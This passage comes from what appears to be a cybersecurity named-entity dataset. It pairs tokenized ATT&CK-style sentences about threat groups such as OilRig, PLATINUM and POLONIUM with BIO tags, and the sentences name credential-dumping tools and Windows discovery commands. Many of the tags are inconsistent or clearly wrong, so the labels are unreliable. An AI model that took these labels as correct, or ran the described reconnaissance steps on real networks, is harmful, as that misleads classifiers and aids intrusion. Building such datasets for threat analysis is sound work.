"O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "credential", - "dumping", - "tools", - "such", - "as", - "LaZagne", - "to", - "steal", - "credentials", - "to", - "accounts", - "logged", - "into", - "the", - "compromised", - "system", - "and", - "to", - "Outlook", - "Web", - "Access.", - "OilRig", - "has", - "also", - "used", - "tool", - "named", - "PICKPOCKET", - "to", - "dump", - "passwords", - "from", - "web", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "DNS", - "for", - "C2", - "including", - "the", - "publicly", - "available", - "<code>requestbin.net</code>", - "tunneling", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "OilRig", - "macro", - "has", - "run", - "a", - "PowerShell", - "command", - "to", - "decode", - "file", - "contents.", - "OilRig", - "has", - "also", - "used", - "certutil", - "to", - "decode", - "base64-encoded", - "files", - "on", - "victims." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "run", - "<code>net", - "user</code>,", - "<code>net", - "user", - "/domain</code>,", - "<code>net", - "group", - "“domain", - "admins”", - "/domain</code>,", - "and", - "<code>net", - "group", - "“Exchange", - "Trusted", - "Subsystem”", - "/domain</code>", - "to", - "get", - "account", - "listings", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "<code>net", - "group", - "/domain</code>,", - "<code>net", - "group", - "“domain", - "admins”", - "/domain</code>,", - "and", - "<code>net", - "group", - "“Exchange", - "Trusted", - "Subsystem”", - "/domain</code>", - "to", - "find", - "domain", - "group", - "permission", - "settings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "encrypted", - "and", - "encoded", - "data", - "in", - "its", - "malware,", - "including", - "by", - "using", - "base64." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "exfiltrated", - "data", - "over", - "FTP", - "separately", - "from", - "its", - "primary", - "C2", - "channel", - "over", - "DNS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "uses", - "remote", - "services", - "such", - "as", - "VPN,", - "Citrix,", - "or", - "OWA", - "to", - "persist", - "in", - "an", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "malware", - "ISMAgent", - "falls", - "back", - "to", - "its", - "DNS", - "tunneling", - "mechanism", - "if", - "it", - "is", - "unable", - "to", - "reach", - "the", - "C2", - "server", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "deleted", - "files", - "associated", - "with", - "their", - "payload", - "after", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "tested", - "malware", - "samples", - "to", - "determine", - "AV", - "detection", - "and", - "subsequently", - "modified", - "the", - "samples", - "to", - "ensure", - "AV", - "evasion." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "can", - "download", - "remote", - "files", - "onto", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "keylogging", - "tools", - "called", - "KEYPUNCH", - "and", - "LONGWATCH." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "credential", - "dumping", - "tools", - "such", - "as", - "LaZagne", - "to", - "steal", - "credentials", - "to", - "accounts", - "logged", - "into", - "the", - "compromised", - "system", - "and", - "to", - "Outlook", - "Web", - "Access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "credential", - "dumping", - "tools", - "such", - "as", - "Mimikatz", - "to", - "steal", - "credentials", - "to", - "accounts", - "logged", - "into", - "the", - "compromised", - "system", - "and", - "to", - "Outlook", - "Web", - "Access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "run", - "<code>net", - "user</code>,", - "<code>net", - "user", - "/domain</code>,", - "<code>net", - "group", - "“domain", - "admins”", - "/domain</code>,", - "and", - "<code>net", - "group", - "“Exchange", - "Trusted", - "Subsystem”", - "/domain</code>", - "to", - "get", - "account", - "listings", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "<code>net", - "localgroup", - "administrators</code>", - "to", - "find", - "local", - "administrators", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "delivered", - "macro-enabled", - "documents", - "that", - "required", - "targets", - "to", - "click", - "the", - "\"enable", - "content\"", - "button", - "to", - "execute", - "the", - "payload", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "delivered", - "malicious", - "links", - "to", - "achieve", - "execution", - "on", - "the", - "target", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - ".doc", - "file", - "extensions", - "to", - "mask", - "malicious", - "executables." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "the", - "publicly", - "available", - "tool", - "SoftPerfect", - "Network", - "Scanner", - "as", - "well", - "as", - "a", - "custom", - "tool", - "called", - "GOLDIRONY", - "to", - "conduct", - "network", - "scanning." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "abused", - "the", - "Outlook", - "Home", - "Page", - "feature", - "for", - "persistence.", - "OilRig", - "has", - "also", - "used", - "CVE-2017-11774", - "to", - "roll", - "back", - "the", - "initial", - "patch", - "designed", - "to", - "protect", - "against", - "Home", - "Page", - "abuse." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "net.exe", - "in", - "a", - "script", - "with", - "<code>net", - "accounts", - "/domain</code>", - "to", - "find", - "the", - "password", - "policy", - "of", - "a", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "tools", - "to", - "identify", - "if", - "a", - "mouse", - "is", - "connected", - "to", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "PowerShell", - "scripts", - "for", - "execution,", - "including", - "use", - "of", - "a", - "macro", - "to", - "run", - "a", - "PowerShell", - "command", - "to", - "decode", - "file", - "contents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "run", - "<code>tasklist</code>", - "on", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "the", - "Plink", - "utility", - "and", - "other", - "tools", - "to", - "create", - "tunnels", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "<code>reg", - "query", - "“HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal", - "Server", - "Client\\Default”</code>", - "on", - "a", - "victim", - "to", - "query", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "Remote", - "Desktop", - "Protocol", - "for", - "lateral", - "movement.", - "The", - "group", - "has", - "also", - "used", - "tunneling", - "tools", - "to", - "tunnel", - "RDP", - "into", - "the", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "Putty", - "to", - "access", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "created", - "scheduled", - "tasks", - "that", - "run", - "a", - "VBScript", - "to", - "execute", - "a", - "payload", - "on", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "a", - "tool", - "called", - "CANDYKING", - "to", - "capture", - "a", - "screenshot", - "of", - "user's", - "desktop." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "sent", - "spearphising", - "emails", - "with", - "malicious", - "attachments", - "to", - "potential", - "victims", - "using", - "compromised", - "and/or", - "spoofed", - "email", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "sent", - "spearphising", - "emails", - "with", - "malicious", - "links", - "to", - "potential", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "LinkedIn", - "to", - "send", - "spearphishing", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "macros", - "to", - "verify", - "if", - "a", - "mouse", - "is", - "connected", - "to", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "run", - "<code>hostname</code>", - "and", - "<code>systeminfo</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "run", - "<code>ipconfig", - "/all</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "<code>netstat", - "-an</code>", - "on", - "a", - "victim", - "to", - "get", - "a", - "listing", - "of", - "network", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "run", - "<code>whoami</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "<code>sc", - "query</code>", - "on", - "a", - "victim", - "to", - "gather", - "information", - "about", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "compromised", - "credentials", - "to", - "access", - "other", - "systems", - "on", - "a", - "victim", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "VBScript", - "macros", - "for", - "execution", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "web", - "shells,", - "often", - "to", - "maintain", - "access", - "to", - "a", - "victim", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "macros", - "to", - "deliver", - "malware", - "such", - "as", - "QUADAGENT", - "and", - "OopsIE.", - "OilRig", - "has", - "used", - "batch", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "credential", - "dumping", - "tool", - "named", - "VALUEVAULT", - "to", - "steal", - "credentials", - "from", - "the", - "Windows", - "Credential", - "Manager." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "WMI", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Orangeworm", - "has", - "copied", - "its", - "backdoor", - "across", - "open", - "network", - "shares,", - "including", - "ADMIN$,", - "C$WINDOWS,", - "D$WINDOWS,", - "and", - "E$WINDOWS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Orangeworm", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "PLATINUM", - "is", - "capable", - "of", - "using", - "Windows", - "hook", - "interfaces", - "for", - "information", - "gathering", - "such", - "as", - "credential", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "B-Way", - "B-Features" - ] - }, - { - "tokens": [ - "PLATINUM", - "has", - "sometimes", - "used", - "drive-by", - "attacks", - "against", - "vulnerable", - "browser", - "plugins." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PLATINUM", - "has", - "leveraged", - "a", - "zero-day", - "vulnerability", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLATINUM", - "has", - "transferred", - "files", - "using", - "the", - "Intel®", - "Active", - "Management", - "Technology", - "(AMT)", - "Serial-over-LAN", - "(SOL)", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLATINUM", - "has", - "used", - "several", - "different", - "keyloggers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PLATINUM", - "has", - "used", - "keyloggers", - "that", - "are", - "also", - "capable", - "of", - "dumping", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PLATINUM", - "has", - "attempted", - "to", - "get", - "users", - "to", - "open", - "malicious", - "files", - "by", - "sending", - "spearphishing", - "emails", - "with", - "attachments", - "to", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLATINUM", - "has", - "renamed", - "rar.exe", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLATINUM", - "has", - "used", - "the", - "Intel®", - "Active", - "Management", - "Technology", - "(AMT)", - "Serial-over-LAN", - "(SOL)", - "channel", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Time", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLATINUM", - "has", - "used", - "various", - "methods", - "of", - "process", - "injection", - "including", - "hot", - "patching." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Way", - "B-Way" - ] - }, - { - "tokens": [ - "PLATINUM", - "has", - "sent", - "spearphishing", - "emails", - "with", - "attachments", - "to", - "victims", - "as", - "its", - "primary", - "initial", - "access", - "vector." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POLONIUM", - "has", - "used", - "OneDrive", - "and", - "DropBox", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "POLONIUM", - "has", - "exfiltrated", - "stolen", - "data", - "to", - "POLONIUM-owned", - "OneDrive", - "and", - "Dropbox", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POLONIUM", - "has", - "used", - "the", - "AirVPN", - "service", - "for", - "operational", - "activity." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "POLONIUM", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "AirVPN", - "and", - "plink", - "in", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POLONIUM", - "has", - "used", - "compromised", - "credentials", - "from", - "an", - "IT", - "company", - "to", - "target", - "downstream", - "customers", - "including", - "a", - "law", - "firm", - "and", - "aviation", - "company." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "POLONIUM", - "has", - "used", - "valid", - "compromised", - "credentials", - "to", - "gain", - "access", - "to", - "victim", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POLONIUM", - "has", - "created", - "and", - "used", - "legitimate", - "Microsoft", - "OneDrive", - "accounts", - "for", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "signed", - "code", - "with", - "self-signed", - "certificates." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "created", - "self-signed", - "certificates", - "to", - "sign", - "malicious", - "installers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "created", - "self-signed", - "digital", - "certificates", - "for", - "use", - "in", - "HTTPS", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "used", - "watering", - "hole", - "attacks", - "to", - "deliver", - "malicious", - "versions", - "of", - "legitimate", - "installers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "created", - "admin", - "accounts", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "attempted", - "to", - "get", - "users", - "to", - "execute", - "compromised", - "installation", - "files", - "for", - "legitimate", - "software", - "including", - "compression", - "applications,", - "security", - "software,", - "browsers,", - "file", - "recovery", - "applications,", - "and", - "other", - "tools", - "and", - "utilities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "I-Tool", - "O", - "B-Way", - "B-Purp", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "named", - "services", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "disguised", - "malicious", - "installer", - "files", - "by", - "bundling", - "them", - "with", - "legitimate", - "software", - "installers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "used", - "a", - "script", - "that", - "configures", - "the", - "knockd", - "service", - "and", - "firewall", - "to", - "only", - "accept", - "C2", - "connections", - "from", - "systems", - "that", - "use", - "a", - "specified", - "sequence", - "of", - "knock", - "ports." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "used", - "Registry", - "run", - "keys", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PROMETHIUM", - "has", - "created", - "new", - "services", - "and", - "modified", - "existing", - "services", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "encrypted", - "the", - "collected", - "files'", - "path", - "with", - "AES", - "and", - "then", - "encoded", - "them", - "with", - "base64." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "developed", - "a", - "file", - "stealer", - "to", - "search", - "C:\\", - "and", - "collect", - "files", - "with", - "certain", - "extensions.", - "Patchwork", - "also", - "executed", - "a", - "script", - "to", - "enumerate", - "all", - "drives,", - "store", - "them", - "as", - "a", - "list,", - "and", - "upload", - "generated", - "files", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "used", - "BITS", - "jobs", - "to", - "download", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "apparently", - "altered", - "NDiskMonitor", - "samples", - "by", - "adding", - "four", - "bytes", - "of", - "random", - "letters", - "in", - "a", - "likely", - "attempt", - "to", - "change", - "the", - "file", - "hashes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "bypassed", - "User", - "Access", - "Control", - "(UAC)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "signed", - "malware", - "with", - "self-signed", - "certificates", - "from", - "fictitious", - "and", - "spoofed", - "legitimate", - "software", - "companies." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "created", - "self-signed", - "certificates", - "from", - "fictitious", - "and", - "spoofed", - "legitimate", - "software", - 